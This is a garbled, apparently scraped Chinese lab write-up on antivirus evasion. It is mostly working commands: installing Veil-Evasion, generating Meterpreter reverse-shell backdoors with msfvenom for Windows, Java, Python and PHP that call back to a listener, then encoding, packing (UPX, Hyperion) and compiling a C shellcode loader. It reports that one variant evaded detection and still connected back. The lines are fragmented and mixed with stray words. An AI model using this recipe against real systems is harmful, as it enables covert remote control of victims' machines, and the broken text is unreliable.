返回目录php
本次实验中,对我来讲最困难的两件事就是veil的安装和任务二的实现免杀T-T,其余内容按照实验指导都很容易理解和实现。实验告诉了我,杀软并不可信,有些后门程序能够躲过它们的检测并对咱们产生威胁,因此安全意识相当重要。(PS.经过实验真心以为查杀方和攻击方都挺不容易的。。)java
返回目录python
安装Veil-Evasion,亲测克隆安装的成功率会大一些:git
sudo apt-get -y install git //安装git git clone https://github.com/Veil-Framework/Veil-Evasion.git //git命令行下载Veil Evasion mv Veil-Evasion /opt //把它移动到opt目录下(可选) cd /opt/Veil-Evasion/ //进入Veil Evasion所在目录 bash setup/setup.sh -s //启动setup脚本开始安装
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.127 LPORT=5309 -f exe > 5309_backdoor.exe
生成后门程序。(同实验二)msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=10.0.0.127 LPORT=5309 -f exe > 5309time10.exe
-e
选择要用的编码器,-i
用于设置编码次数,-b
设定payload中须要去除的字符。msfvenom -p java/meterpreter/reverse_tcp LHOST=10.0.0.127 LPORT=5309 x> wsj_jar.jar
指令:msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.127 LPORT=5309 -f raw > wsj_py.py
github
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.127 LPORT=5309 x> wsj_php.php
veil
->use evasion
进入Evil-Evasion配置界面:upx wsjpayload.exe -o wsjpayload.upxed.exe
/usr/share/windows-binaries/hyperion/
,并进入。wine hyperion.exe -v wsj_upxed.exe wsj_upxed_Hyperion.exe
msfvenom -p windows/meterpreter/reverse_http LHOST=10.0.0.127 LPORT=5309 -f c
i686-w64-mingw32-g++ 5309.c -o 5309.exe
加壳+迭代+C语言调用bloxor编码的shellcode
的方式免杀成功并可回连:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=10.0.0.127 LPORT=5309 -f c
;返回目录shell